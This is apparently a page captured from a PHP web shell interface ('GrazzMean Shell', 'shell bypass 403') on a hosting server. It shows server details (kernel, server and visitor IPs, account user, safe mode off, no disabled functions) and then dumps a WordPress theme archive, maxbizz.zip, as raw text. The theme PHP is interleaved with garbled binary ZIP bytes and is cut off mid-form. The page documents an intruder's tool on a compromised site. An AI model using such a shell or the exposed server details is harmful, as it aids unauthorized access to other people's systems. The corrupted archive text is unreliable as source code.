shell bypass 403

GrazzMean Shell

: /home/www/phadsconsult.com/ [ drwxr-xr-x ]
Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 18.216.94.93
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE

name : maxbizz.zip
PK�8FZG����T�Tinc/frontend/template-tags.phpnu�[���<?php
/**
 * Custom template tags for this theme
 *
 * Eventually, some of the functionality here could be replaced by core features.
 *
 * @package Maxbizz
 */

if ( ! function_exists( 'maxbizz_posted_on' ) ) :
	/**
	 * Prints HTML with meta information for the current post-date/time.
	 */
	function maxbizz_posted_on() {
		$time_string = '<time class="entry-date published updated" datetime="%1$s">%2$s</time>';
		if ( get_the_time( 'U' ) !== get_the_modified_time( 'U' ) ) {
			$time_string = '<time class="entry-date published" datetime="%1$s">%2$s</time>';
		}

		$time_string = sprintf( $time_string,
            esc_attr( get_the_date( DATE_W3C ) ),
            esc_html( get_the_date() )
        );

		$posted_on = sprintf(
			/* translators: %s: post date. */
			esc_html_x( '%s', 'post date', 'maxbizz' ),
			'<a href="' . esc_url( get_permalink() ) . '" rel="bookmark">' . $time_string . '</a>'
		);

		echo '<span class="posted-on">' . $posted_on . '</span>'; // WPCS: XSS OK.

	}
endif;

if ( ! function_exists( 'maxbizz_posted_in' ) ) :
    /**
     * Prints HTML with meta information for the current author.
     */
    function maxbizz_posted_in() {
        $categories_list = get_the_category_list( esc_html__( ' ', 'maxbizz' ) );
        $posted_in = '';
        if ( $categories_list ) {
            /* translators: 1: list of categories. */
            $posted_in = sprintf( esc_html__( '%1$s', 'maxbizz' ), $categories_list ); // WPCS: XSS OK.
        }

        echo '<div class="post-cat"><div class="posted-in">' . $posted_in . '</div></div>'; // WPCS: XSS OK.

    };
endif;

if ( ! function_exists( 'maxbizz_posted_by' ) ) :
	/**
	 * Prints HTML with meta information for the current author.
	 */
	function maxbizz_posted_by() {
		$byline = sprintf(
			/* translators: %s: post author. */
			esc_html_x( '%s', 'post author', 'maxbizz' ),
			'<span class="author vcard"><a class="url fn n" href="' . esc_url( get_author_posts_url( get_the_author_meta( 'ID' ) ) ) . '">' . esc_html( get_the_author() ) . '</a></span>'
		);

		echo '<span class="byline"> ' . $byline . '</span>'; // WPCS: XSS OK.

	}
endif;

if ( ! function_exists( 'maxbizz_post_meta' ) ) :
    /**
     * Prints HTML with meta information for the current author.
     */
    function maxbizz_post_meta() {
        $time_string = '<time class="entry-date published updated" datetime="%1$s">%2$s</time>';
        if ( get_the_time( 'U' ) !== get_the_modified_time( 'U' ) ) {
            $time_string = '<time class="entry-date published" datetime="%1$s">%2$s</time>';
        }

        $time_string = sprintf( $time_string,
            esc_attr( get_the_date( DATE_W3C ) ),
            esc_html( get_the_date() )
        );

        $posted_on = sprintf(
        /* translators: %s: post date. */
            esc_html_x( '%s', 'post date', 'maxbizz' ),
            '<a href="' . esc_url( get_permalink() ) . '" rel="bookmark">' . $time_string . '</a>'
        );

        $byline = sprintf(
        /* translators: %s: post author. */
            esc_html_x( '%s', 'post author', 'maxbizz' ),
            '<a class="url fn n" href="' . esc_url( get_author_posts_url( get_the_author_meta( 'ID' ) ) ) . '">' . esc_html( get_the_author() ) . '</a>'
        );

        $categories_list = get_the_category_list( esc_html__( ', ', 'maxbizz' ) );
        if ( $categories_list ) {
            /* translators: 1: list of categories. */
            $posted_in = sprintf( esc_html__( '%1$s', 'maxbizz' ), $categories_list ); // WPCS: XSS OK.
        }

        $comment_num = sprintf(
            /* translators: %s: post author. */
            esc_html_x( '%s', 'post comment', 'maxbizz' ),
            '<a href="' .get_comments_link(). '">'. get_comments_number_text( esc_html__('0 Comments', 'maxbizz'), esc_html__('1 Comment', 'maxbizz'), esc_html__(  '% Comments', 'maxbizz') ). '</a>' );

        /* translators: used between list items, there is a space after the comma */
        $tags_list = get_the_tag_list( '', esc_html_x( ', ', 'list item separator', 'maxbizz' ) );
        if ( $tags_list ) {
            /* translators: 1: list of tags. */
            $tag_with = sprintf( '<span class="tags-links">' . esc_html__( '%1$s', 'maxbizz' ) . '</span>', $tags_list ); // WPCS: XSS OK.
        }
        $metas = maxbizz_get_option( 'post_entry_meta' );
        if ( ! empty( $metas ) ) :
            if( in_array('date', $metas) ) echo '<span class="posted-on">' . $posted_on . '</span>';
            if( in_array('author', $metas) ) echo '<span class="byline"> / ' . $byline . '</span>';
            if( in_array('comm', $metas) ) echo '<span class="comment-num"> / ' . $comment_num . '</span>';
        endif;

    }
endif;

if ( ! function_exists( 'maxbizz_entry_footer' ) ) :
	/**
	 * Prints HTML with meta information for the categories, tags and comments.
	 */
	function maxbizz_entry_footer() {
		// Hide category and tag text for pages.
		if ( 'post' === get_post_type() ) {
			/* translators: used between list items, there is a space after the comma */
			$tags_list = get_the_tag_list( '', esc_html_x( ' ', 'list item separator', 'maxbizz' ) );
			if ( $tags_list ) {
				/* translators: 1: list of tags. */
				printf( '<div class="tagcloud">' . esc_html__( '%1$s', 'maxbizz' ) . '</div>', $tags_list ); // WPCS: XSS OK.
            }
            if( maxbizz_get_option('post_socials') ) maxbizz_socials_share();
		}

	}
endif;

/** Posts Navigation **/
if ( ! function_exists( 'maxbizz_posts_navigation' ) ) :
    function maxbizz_posts_navigation($prev = '<i class="ot-flaticon-arrow-pointing-to-left"></i>', $next = '<i class="ot-flaticon-arrowsoutline"></i>', $pages='') {
        global $wp_query, $wp_rewrite;
        $wp_query->query_vars['paged'] > 1 ? $current = $wp_query->query_vars['paged'] : $current = 1;
        if($pages==''){
            global $wp_query;
            $pages = $wp_query->max_num_pages;
            if(!$pages)
            {
                $pages = 1;
            }
        }
        $pagination = array(
            'base'          => str_replace( 999999999, '%#%', get_pagenum_link( 999999999 ) ),
            'format'        => '',
            'current'       => max( 1, get_query_var('paged') ),
            'total'         => $pages,
            'prev_text'     => $prev,
            'next_text'     => $next,
            'type'          => 'list',
            'end_size'      => 3,
            'mid_size'      => 3
        );
        $return =  paginate_links( $pagination );
        echo str_replace( "<ul class='page-numbers'>", '<ul class="page-pagination none-style">', $return );
    }
endif;

/** Excerpt blog post **/
if ( ! function_exists( 'maxbizz_excerpt' ) ) :
function maxbizz_excerpt($limit) {

    $excerpt = explode(' ', get_the_excerpt(), $limit);
    
    if (count($excerpt)>=$limit) {
        array_pop($excerpt);
        $excerpt = implode(" ",$excerpt);
    } else {
        $excerpt = implode(" ",$excerpt);
    }
    $excerpt = preg_replace('`[[^]]*]`','',$excerpt);

    return $excerpt;
};
endif;

//Custom comment list
if ( ! function_exists( 'maxbizz_comment_list' ) ) :
    function maxbizz_comment_list($comment, $args, $depth) {

        $GLOBALS['comment'] = $comment; ?>

        <li id="comment-<?php comment_ID(); ?>" <?php comment_class('comment-item'); ?>>
            <article class="comment-wrap clearfix">

                <div class="gravatar">
                    <?php echo get_avatar( $comment, 80 ); ?>
                </div>

                <div class="comment-content">
                    <div class="comment-meta">
                        <h6 class="comment-author"><?php printf(__('%s','maxbizz'), get_comment_author()) ?></h6>
                        <span class="comment-time"><?php comment_time( get_option( 'date_format' ) ); ?></span>
                        <div class="comment-reply"><?php echo preg_replace( '/comment-reply-link/', 'comment-reply-link', get_comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])))); ?></div>
                    </div>
                    <div class="comment-text">
                        <?php if ($comment->comment_approved == '0'){ ?>
                            <em><?php esc_html_e('Your comment is awaiting moderation.','maxbizz') ?></em>
                        <?php }else{ ?>
                            <?php comment_text() ?>
                        <?php } ?>
                    </div>
                </div>

            </article>
        </li>

        <?php
    }
endif;

//Generate custom search form
function maxbizz_search_form( $form ) {
    $form = '<form role="search" method="get" class="search-form" action="' . esc_url( home_url( '/' ) ) . '" >
    <label><span class="screen-reader-text">Search for:</span>
    <input type="search" class="search-field" placeholder="' . esc_attr__( 'Search&hellip;', 'maxbizz' ) . '" value="' . get_search_query() . '" name="s" /></label>
	<button type="submit" class="search-submit"><i class="ot-flaticon-search-1"></i></button>
    </form>';

    return $form;
}
add_filter( 'get_search_form', 'maxbizz_search_form' );

//Add span to category post count
function maxbizz_cat_count_span($links) {
    $links = str_replace('</a> (', '</a> <span class="posts-count">(', $links);
    $links = str_replace(')', ')</span>', $links);
    return $links;
}
add_filter('wp_list_categories', 'maxbizz_cat_count_span');

//Add span to archive post count
function maxbizz_archive_count_span($links) {
    $links = str_replace('</a>&nbsp;(', '</a> <span class="posts-count">(', $links);
    $links = str_replace(')', ')</span>', $links);
    return $links;
}
add_filter('get_archives_link', 'maxbizz_archive_count_span');

/** Socials Share Post**/
if ( ! function_exists( 'maxbizz_socials_share' ) ) :

    function maxbizz_socials_share(){
        $share = maxbizz_get_option( 'post_socials' );
        echo '<div class="share-post">';

        if( in_array('twit', $share) ) echo '<a class="twit" target="_blank" href="https://twitter.com/intent/tweet?text=' .get_the_title(). '&url=' .get_the_permalink(). '" title="Twitter"><i class="fab fa-twitter"></i></a>';
        if( in_array('face', $share) ) echo '<a class="face" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=' .get_the_permalink(). '" title="Facebook"><i class="fab fa-facebook-f"></i></a>';
        if( in_array('pint', $share) ) echo '<a class="pint" target="_blank" href="https://www.pinterest.com/pin/create/button/?url=' .get_the_permalink(). '&description=' .get_the_title(). '" title="Pinterest"><i class="fab fa-pinterest-p"></i></a>';
        if( in_array('link', $share) ) echo '<a class="linked" target="_blank" href="https://www.linkedin.com/shareArticle?mini=true&url=' .get_the_permalink(). '&title=' .get_the_title(). '&summary=' .esc_url( get_home_url('/') ). '&source=' .get_bloginfo( 'name' ). '" title="LinkedIn"><i class="fab fa-linkedin-in"></i></a>';
        if( in_array('google', $share) ) echo ' <a class="google" target="_blank" href="https://plus.google.com/share?url=' .get_the_permalink(). '" title="Google Plus"><i class="fab fa-google-plus-g"></i></a>';
        if( in_array('tumblr', $share) ) echo ' <a class="tumblr" target="_blank" href="http://www.tumblr.com/share/link?url=' .get_the_permalink(). '&name=' .get_the_title(). '&description=' .get_the_excerpt(). '" title="Tumblr"><i class="fab fa-tumblr"></i></a>';
        if( in_array('reddit', $share) ) echo '<a class="reddit" href="http://reddit.com/submit?url=' .get_the_permalink(). '&title=' .get_the_title(). '" target="_blank" title="Reddit"><i class="fab fa-reddit-alien" aria-hidden="true"></i></a>';
        if( in_array('vk', $share) ) echo '<a class="vk" href="http://vk.com/share.php?url=' .get_the_permalink(). '" target="_blank" title="VK"><i class="fab fa-vk"></i></a>';

        echo '</div>';
    };
endif;

/** Single Post Navigation**/
if ( ! function_exists( 'maxbizz_single_post_nav' ) ) :

    function maxbizz_single_post_nav(){
        echo '<div class="post-nav clearfix">';
        $class = '';
        $pcate = '';
        $ncate = '';
        if ( get_previous_post() ) {
            $ppost  = get_previous_post();
            $ptitle = get_the_title( $ppost->ID );
            $pdate  = get_the_time( get_option( 'date_format' ), $ppost->ID );
            $pimage = get_the_post_thumbnail( $ppost->ID , 'thumbnail');
            if( is_singular('ot_portfolio') ){
                $terms  = get_the_terms($ppost->ID,'portfolio_cat');
                $count  = count($terms);
                if ( $count > 0 ){  //If there are more than 0 terms
                    foreach ( $terms as $term ) { 
                        $pcate   .= $term->name. '<span> / </span>';
                    }
                }
                $pdate = $pcate; 
            }
            if( !$pimage ) $class = ' not-thumb';
            echo '<div class="post-prev'.$class.'">';
            previous_post_link( '%link', '<div class="thumb-post">'.$pimage.'</div><div class="info-post"><h6>'.$ptitle.'</h6><span>'.$pdate.'</span></div>' );
            echo '</div>';
        }
        if ( get_next_post() ) {
            $npost  = get_next_post();
            $ntitle = get_the_title( $npost->ID );
            $ndate  = get_the_time( get_option( 'date_format' ), $npost->ID );
            $nimage = get_the_post_thumbnail( $npost->ID , 'thumbnail');
            if( is_singular('ot_portfolio') ){
                $terms  = get_the_terms($npost->ID,'portfolio_cat');
                $count  = count($terms);
                if ( $count > 0 ){  //If there are more than 0 terms
                    foreach ( $terms as $term ) { 
                        $ncate   .= $term->name. ' ';
                    }
                }
                $ndate = $ncate; 
            }
            if( !$nimage ) $class = ' not-thumb';
            echo '<div class="post-next'.$class.'">';
            next_post_link( '%link', '<div class="thumb-post">'.$nimage.'</div><div class="info-post"><h6>'.$ntitle.'</h6><span>'.$ndate.'</span></div>' );
            echo '</div>';
        }
        echo '</div>';
    };
endif;

/** Add Contact Methods in the User Profile **/
function maxbizz_user_contact_methods( $user_contact ) {
    $user_contact['facebook']   = esc_html__( 'Facebook URL', 'maxbizz' );
    $user_contact['skype']      = esc_html__( 'Skype Username', 'maxbizz' );
    $user_contact['twitter']    = esc_html__( 'Twitter Handle', 'maxbizz' );
    $user_contact['youtube']    = esc_html__( 'Youtube Channel', 'maxbizz' );
    $user_contact['linkedin']   = esc_html__( 'LinkedIn', 'maxbizz' );
    $user_contact['googleplus'] = esc_html__( 'Google +', 'maxbizz' );
    $user_contact['pinterest']  = esc_html__( 'Pinterest', 'maxbizz' );
    $user_contact['instagram']  = esc_html__( 'Instagram', 'maxbizz' );
    $user_contact['github']     = esc_html__( 'Github Profile', 'maxbizz' ); 
    return $user_contact; 
};
add_filter( 'user_contactmethods', 'maxbizz_user_contact_methods' );

function maxbizz_author_info_box() {

    global $post;

    $author_details = '';
    // Get author's display name - NB! changed display_name to first_name. Error in code.
    $display_name = get_the_author_meta( 'display_name', $post->post_author );

    // If display name is not available then use nickname as display name
    if ( empty( $display_name ) )
    $display_name = get_the_author_meta( 'nickname', $post->post_author );

    // Get author's biographical information or description
    $user_description   = get_the_author_meta( 'user_description', $post->post_author );
    $user_twitter       = get_the_author_meta('twitter', $post->post_author);
    $user_facebook      = get_the_author_meta('facebook', $post->post_author);
    $user_skype         = get_the_author_meta('skype', $post->post_author);
    $user_linkedin      = get_the_author_meta('linkedin', $post->post_author);
    $user_youtube       = get_the_author_meta('youtube', $post->post_author);
    $user_googleplus    = get_the_author_meta('googleplus', $post->post_author);
    $user_pinterest     = get_the_author_meta('pinterest', $post->post_author);
    $user_instagram     = get_the_author_meta('instagram', $post->post_author);
    $user_github        = get_the_author_meta('github', $post->post_author);

    // Get link to the author archive page
    $user_posts = get_author_posts_url( get_the_author_meta( 'ID' , $post->post_author));
    if ( ! empty( $display_name ) )
    // Author avatar - - the number 90 is the px size of the image.
    $author_details .= '<div class="author-image">' . get_avatar( get_the_author_meta('ID') , 160 ) . '</div>';
    $author_details .= '<div class="author-info">';
    $author_details .= '<p class="title text-primary font-second">' . esc_html__('Author', 'maxbizz'). '</p>';
    $author_details .= '<h6>' . $display_name . '</h6>';
    $author_details .= '<p class="des">' . get_the_author_meta( 'description' ). '</p>';
    $author_details .= '<div class="author-socials">';

    // Check if author has Twitter in their profile
    if ( ! empty( $user_twitter ) ) {
        $author_details .= ' <a href="' . $user_twitter .'" target="_blank" rel="nofollow" title="Twitter" class="tooltip"><i class="fab fa-twitter"></i> </a>';
    }

    if ( ! empty( $user_facebook ) ) {
        $author_details .= ' <a href="' . $user_facebook .'" target="_blank" rel="nofollow" title="Facebook" class="tooltip"><i class="fab fa-facebook-f"></i> </a>';
    }

    if ( ! empty( $user_skype ) ) {
        $author_details .= ' <a href="' . $user_skype .'" target="_blank" rel="nofollow" title="Username paaljoachim Skype" class="tooltip"><i class="fab fa-skype"></i> </a>';
    }

    if ( ! empty( $user_linkedin ) ) {
        $author_details .= ' <a href="' . $user_linkedin .'" target="_blank" rel="nofollow" title="LinkedIn" class="tooltip"><i class="fab fa-linkedin-in"></i> </a>';
    }

    if ( ! empty( $user_youtube ) ) {
        $author_details .= ' <a href="' . $user_youtube .'" target="_blank" rel="nofollow" title="Youtube" class="tooltip"><i class="fab fa-youtube"></i> </a>';
    }

    if ( ! empty( $user_googleplus ) ) {
        $author_details .= ' <a href="' . $user_googleplus .'" target="_blank" rel="nofollow" title="Google+" class="tooltip"><i class="fab fa-google-plus"></i> </a>';
    }

    if ( ! empty( $user_pinterest ) ) {
        $author_details .= ' <a href="' . $user_pinterest .'" target="_blank" rel="nofollow" title="Pinterest" class="tooltip"><i class="fab fa-pinterest"></i> </a>';
    }

    if ( ! empty( $user_instagram ) ) {
        $author_details .= ' <a href="' . $user_instagram .'" target="_blank" rel="nofollow" title="Instagram" class="tooltip"><i class="fab fa-instagram"></i> </a>';
    }

    if ( ! empty( $user_github ) ) {
        $author_details .= ' <a href="' . $user_github .'" target="_blank" rel="nofollow" title="Github" class="tooltip"><i class="fab fa-github"></i> </a>';
    }

    $author_details .= '</div></div>';

    // Pass all this info to post content 
    echo '<div class="author-bio" >' . $author_details . '</div>';
}
/** Allow HTML in author bio section **/
remove_filter('pre_user_description', 'wp_filter_kses');

/** Related Posts **/
function maxbizz_related_posts() {

    global $post;

    $related = get_posts( array( 'category__in' => wp_get_post_categories($post->ID), 'numberposts' => 2, 'post__not_in' => array($post->ID) ) );
    if( $related ) : 

    echo '<div class="related-posts">';
    echo '<h4>'.esc_html__( 'Related Posts', 'maxbizz' ).'</h4>';
    echo '<div class="row">';
    foreach( $related as $post ) {
    setup_postdata($post); ?>
    
    <div class="col-sm-6">
        <div class="post-box post-item">
            <div class="post-inner">
                <?php if(has_post_thumbnail()) { ?>
                <div class="entry-media post-cat-abs">
                    <a href="<?php the_permalink(); ?>"><?php the_post_thumbnail( 'maxbizz-post-thumbnail-grid' ); ?></a>
                    <?php maxbizz_posted_in(); ?>
                </div>
                <?php } ?>
                <div class="inner-post">
                    <?php if( !has_post_thumbnail() ) maxbizz_posted_in(); ?>
                    <div class="entry-header">
                        <?php the_title( '<h5 class="entry-title"><a class="title-link" href="' . esc_url( get_permalink() ) . '" rel="bookmark">', '</a></h5>' ); ?>
                    </div>
                </div>
                <div class="entry-meta">
                    <?php if( maxbizz_get_option( 'post_entry_meta' ) ) { maxbizz_post_meta(); } ?>
                    <a href="<?php the_permalink(); ?>" class="btn-details"><i class="ot-flaticon-trajectory"></i></a>
                </div>
            </div>
        </div>
    </div>

    <?php } wp_reset_postdata();

    echo '</div>';
    echo '</div>';

    endif;
};

/** Custom widget recent post **/
require get_template_directory() . '/inc/frontend/widgets/recent-posts.php';
require get_template_directory() . '/inc/frontend/widgets/author-widget.php';PK�8FZ�	*3��inc/frontend/builder.phpnu�[���<?php
/** header desktop **/
if ( ! function_exists( 'maxbizz_header_builder' ) ) {
    function maxbizz_header_builder (){
        $header_builder = '';    

        if ( is_page() ) {
            if ( function_exists('rwmb_meta') ) {
                global $wp_query;
                $metabox_fb = rwmb_meta( 'select_header', 'field_type=select_advanced', $wp_query->get_queried_object_id() ); 
                if ($metabox_fb != '') {
                    $header_builder = $metabox_fb;
                }else{
                    $header_builder = maxbizz_get_option('header_layout');
                }
            } 
        }else{
            $header_builder = maxbizz_get_option('header_layout');
        }

        if( !$header_builder ) {
            get_template_part('inc/frontend/header/header-default');
        }else{
            echo '<div class="header-desktop">';
            if ( did_action( 'elementor/loaded' ) ) {               
                echo \Elementor\Plugin::$instance->frontend->get_builder_content( $header_builder ); 
            }
            echo '</div>';
        }
    }
}

/** header mobile **/
if ( ! function_exists( 'maxbizz_mobile_builder' ) ) {
    function maxbizz_mobile_builder (){
        
        if ( is_page() ) {
            if ( function_exists('rwmb_meta') ) {
                global $wp_query;
                $metabox_hmb = rwmb_meta( 'select_header_mobile', 'field_type=select_advanced', $wp_query->get_queried_object_id() ); 
                if ($metabox_hmb != '') {
                    $mobile_builder = $metabox_hmb;
                }else{
                    $mobile_builder = maxbizz_get_option('header_mobile');
                }
            } 
        }else{
            $mobile_builder = maxbizz_get_option('header_mobile');
        }

        if( !$mobile_builder ) {
            get_template_part('inc/frontend/header/header-mobile');
        }else{
            echo '<div class="header-mobile">';
            if ( did_action( 'elementor/loaded' ) ) {               
                echo \Elementor\Plugin::$instance->frontend->get_builder_content( $mobile_builder ); 
            }
            echo '</div>';
        }
    }
}

/** side panel **/
if ( ! function_exists( 'maxbizz_sidepanel_builder' ) ) {
    function maxbizz_sidepanel_builder (){

        $panel_builder = maxbizz_get_option('sidepanel_layout');

        if( !$panel_builder ) {
            return;
        }else{
            if ( did_action( 'elementor/loaded' ) ) {               
                echo \Elementor\Plugin::$instance->frontend->get_builder_content( $panel_builder ); 
            }
        }
    }
}

/** 404 template **/
if ( ! function_exists( 'maxbizz_404_builder' ) ) {
    function maxbizz_404_builder (){

        $error_builder = maxbizz_get_option('page_404');

        if( !$error_builder ) { ?>
            <div class="error-404 not-found text-center">
                <div class="container">
                    <a href="<?php echo esc_url( home_url( '/' ) ); ?>">
                        <img class="error-logo" src="<?php echo esc_url( get_template_directory_uri() ); ?>/images/logo-white.svg" alt="404">
                    </a>
                    <h1><?php wp_kses( _e( '404', 'maxbizz' ), wp_kses_allowed_html('post')  ); ?></h1>
                    <h2><?php esc_html_e( 'Sorry! Page Not Found!', 'maxbizz' ); ?></h2>
                    <div class="page-content">
                        <p><?php esc_html_e( 'Oops! The page you are looking for does not exist. Please return to the site’s homepage.', 'maxbizz' ); ?></p>
                        <?php get_search_form(); ?>
                        <a class="octf-btn" href="<?php echo esc_url( home_url( '/' ) ); ?>"><?php esc_html_e( 'take me home', 'maxbizz' ); ?></a>
                    </div>
                </div>
            </div>
        <?php }else{
            if ( did_action( 'elementor/loaded' ) ) {               
                echo \Elementor\Plugin::$instance->frontend->get_builder_content( $error_builder ); 
            }
        }
    }
}

/** footer **/
if ( ! function_exists( 'maxbizz_footer_builder' ) ) {
    function maxbizz_footer_builder (){
        $footer_builder = '';    

        if ( is_page() ) {
            if ( function_exists('rwmb_meta') ) {
                global $wp_query;
                $metabox_fb = rwmb_meta( 'select_footer', 'field_type=select_advanced', $wp_query->get_queried_object_id() ); 
                if ($metabox_fb != '') {
                    $footer_builder = $metabox_fb;
                }else{
                    $footer_builder = maxbizz_get_option('footer_layout');
                }
            } 
        }else{
            $footer_builder = maxbizz_get_option('footer_layout');
        }

        if( !$footer_builder ) {
            return;
        }else{
            echo '<footer id="site-footer" class="site-footer" itemscope="itemscope" itemtype="http://schema.org/WPFooter">';
            if ( did_action( 'elementor/loaded' ) ) {               
                echo \Elementor\Plugin::$instance->frontend->get_builder_content( $footer_builder ); 
            }
            echo '</footer>';
        }
    }
}PK�8FZ���qq&inc/frontend/header/header-default.phpnu�[���<!-- Main header start -->
<div class="octf-main-header">
	<div class="octf-area-wrap">
		<div class="container octf-mainbar-container">
			<div class="octf-mainbar">
				<div class="octf-mainbar-row octf-row">
					<div class="octf-col logo-col">
						<div id="site-logo" class="site-logo">
							<a href="<?php echo esc_url( home_url( '/' ) ); ?>">
								<img  src="<?php echo esc_url( get_template_directory_uri() ); ?>/images/logo.svg" alt="<?php echo esc_attr( get_bloginfo( 'name', 'display' ) ); ?>">
							</a>
						</div>
					</div>
					<div class="octf-col menu-col">
						<nav id="site-navigation" class="main-navigation">			
							<?php
								$menus = wp_get_nav_menus();
								if( $menus ){
									$options = [];
									foreach ( $menus as $menu ) {
										$options[ $menu->slug ] = $menu->name;
									}
									wp_nav_menu( array(
										'menu' 			 => array_keys( $options )[0],
										'menu_id'        => 'primary-menu',
										'container'      => 'ul',
									) );
								}
								else{
									wp_nav_menu( array(
										'theme_location' => 'primary',
										'menu_id'        => 'primary-menu',
										'container'      => 'ul',
									) );
								}
							?>
						</nav><!-- #site-navigation -->
					</div>
				</div>
			</div>
		</div>
	</div>
</div>		
<!-- Main header close -->PK�8FZ��;mm%inc/frontend/header/header-mobile.phpnu�[���<div class="header_mobile">
	<div class="container">
		<div class="mlogo_wrapper clearfix">
	        <div class="mobile_logo">
				<a href="<?php echo esc_url( home_url( '/' ) ); ?>">
					<img src="<?php echo esc_url( get_template_directory_uri() ); ?>/images/logo.svg" alt="<?php echo esc_attr( get_bloginfo( 'name', 'display' ) ); ?>">
				</a>
	    	</div>
	        <div id="mmenu_toggle">
		        <button></button>
		    </div>
	    </div>
	    <div class="mmenu_wrapper">		
			<div class="mobile_nav">
				<?php
					$menus = wp_get_nav_menus();
					if( $menus ){
						$options = [];
						foreach ( $menus as $menu ) {
							$options[ $menu->slug ] = $menu->name;
						}
						wp_nav_menu( array(
							'menu' 			 => array_keys( $options )[0],
							'menu_class'     => 'mobile_mainmenu none-style',
							'container'      => '',
						) );
					}
					else{
						wp_nav_menu( array(
							'theme_location' => 'primary',
							'menu_class'     => 'mobile_mainmenu none-style',
							'container'      => '',
						) );
					}
				?>
			</div>   	
	    </div>
    </div>
</div>PK�8FZH�]6++&inc/frontend/widgets/author-widget.phpnu�[���<?php 
class Maxbizz_Author_Widget extends WP_Widget {
 	
 	/**
     * Register widget with WordPress.
     */
    public function __construct() {
    	// Add Widget scripts
   		add_action('admin_enqueue_scripts', array($this, 'author_scripts'));

        parent::__construct(
            'author_widget', // Base ID
            'OT Author', // Name
            array( 'description' => esc_html__( 'A Author Widget', 'maxbizz' ), 'classname' => 'maxbizz_author-widget' ) // Args
        );
    }
 	
 	public function author_scripts() {
	   wp_enqueue_script( 'media-upload' );
	   wp_enqueue_media();
	   wp_enqueue_script('maxbizz_upload_media_admin', get_template_directory_uri() . '/inc/backend/js/upload_media_widget.js', array('jquery'));
	}

 	/**
     * Front-end display of widget.
     *
     * @see WP_Widget::widget()
     *
     * @param array $args     Widget arguments.
     * @param array $instance Saved values from database.
     */
    public function widget( $args, $instance ) {
 		// Our variables from the widget settings
        $title = apply_filters( 'widget_title', $instance['title'] );
        $text = ! empty( $instance['text'] ) ? $instance['text'] : '';
    	$image = ! empty( $instance['image'] ) ? $instance['image'] : '';
        $facebook = ! empty( $instance['facebook'] ) ? $instance['facebook'] : '';
        $twitter = ! empty( $instance['twitter'] ) ? $instance['twitter'] : '';
        $google = ! empty( $instance['google'] ) ? $instance['google'] : '';
        $linkedin = ! empty( $instance['linkedin'] ) ? $instance['linkedin'] : '';
        $pinterest = ! empty( $instance['pinterest'] ) ? $instance['pinterest'] : '';
        $instagram = ! empty( $instance['instagram'] ) ? $instance['instagram'] : '';
        $youtube = ! empty( $instance['youtube'] ) ? $instance['youtube'] : '';
        $dribbble = ! empty( $instance['dribbble'] ) ? $instance['dribbble'] : '';
    	
 		ob_start();
        echo $args['before_widget'];
        ?>
        <div class="author-widget_wrapper text-center">
            <div class="author-widget_image-wrapper">
                <img class="author-widget_image" src="<?php echo esc_url($image); ?>" alt="<?php echo esc_attr($title); ?>">
            </div>
            <div class="author-widget_info">
                <?php 
                if ( ! empty( $title ) ) {echo '<h6 class="author-widget_title">' . $title . '</h6>';} 
                if ( ! empty( $text ) ) {echo '<p class="author-widget_text">' . $text . '</p>';} 
                ?>
                <div class="author-widget_social">
                    <?php if ($twitter) { echo '<a class="social-twitter" href="'.esc_url($twitter).'"><i class="fab fa-twitter"></i></a>'; } ?>
                    <?php if ($facebook) { echo '<a class="social-facebook" href="'.esc_url($facebook).'"><i class="fab fa-facebook-f"></i></a>'; } ?>            
                    <?php if ($google) { echo '<a class="social-google" href="'.esc_url($google).'"><i class="fab fa-google-plus-g"></i></a>'; } ?>           
                    <?php if ($linkedin) { echo '<a class="social-linkedin" href="'.esc_url($linkedin).'"><i class="fab fa-linkedin-in"></i></a>'; } ?>
                    <?php if ($pinterest) { echo '<a class="social-pinterest" href="'.esc_url($pinterest).'"><i class="fab fa-pinterest-p"></i></a>'; } ?>
                    <?php if ($instagram) { echo '<a class="social-instagram" href="'.esc_url($instagram).'"><i class="fab fa-instagram"></i></a>'; } ?>
                    <?php if ($youtube) { echo '<a class="social-youtube" href="'.esc_url($youtube).'"><i class="fab fa-youtube"></i></a>'; } ?>
                    <?php if ($dribbble) { echo '<a class="social-dribbble" href="'.esc_url($dribbble).'"><i class="fab fa-dribbble"></i></a>'; } ?>
                </div>
            </div>
        </div>


        <?php 
        echo $args['after_widget'];
 		ob_end_flush();
    }
 	
 	/**
     * Back-end widget form.
     *
     * @see WP_Widget::form()
     *
     * @param array $instance Previously saved values from database.
     */
    public function form( $instance ) {
		$title = ! empty( $instance['title'] ) ? $instance['title'] : '';
        $text = ! empty( $instance['text'] ) ? $instance['text'] : '';
        $image = ! empty( $instance['image'] ) ? $instance['image'] : '';

        $facebook = ! empty( $instance['facebook'] ) ? $instance['facebook'] : '';
        $twitter = ! empty( $instance['twitter'] ) ? $instance['twitter'] : '';
        $google = ! empty( $instance['google'] ) ? $instance['google'] : '';
        $linkedin = ! empty( $instance['linkedin'] ) ? $instance['linkedin'] : '';
        $pinterest = ! empty( $instance['pinterest'] ) ? $instance['pinterest'] : '';
        $instagram = ! empty( $instance['instagram'] ) ? $instance['instagram'] : '';
        $youtube = ! empty( $instance['youtube'] ) ? $instance['youtube'] : '';
        $dribbble = ! empty( $instance['dribbble'] ) ? $instance['dribbble'] : '';
    	?>
        <p>
            <label for="<?php echo $this->get_field_id( 'image' ); ?>"><?php echo esc_html__( 'Avatar:' ); ?></label>
            <input class="widefat" id="<?php echo $this->get_field_id( 'image' ); ?>" name="<?php echo $this->get_field_name( 'image' ); ?>" type="text" value="<?php echo esc_url( $image ); ?>" />
            <button class="upload_image_button button button-primary"><?php echo esc_html__( 'Upload Image' ); ?></button>
       </p>
        <p>
            <label for="<?php echo esc_attr( $this->get_field_id( 'title' ) ); ?>"><?php echo esc_html__( 'Name:', 'maxbizz' ); ?></label>
            <input class="widefat" id="<?php echo esc_attr( $this->get_field_id( 'title' ) ); ?>" name="<?php echo esc_attr( $this->get_field_name( 'title' ) ); ?>" type="text" value="<?php echo esc_attr( $title ); ?>">
        </p>
        <p>
            <label for="<?php echo esc_attr( $this->get_field_id( 'text' ) ); ?>"><?php echo esc_html__( 'Description:', 'maxbizz' ); ?></label>
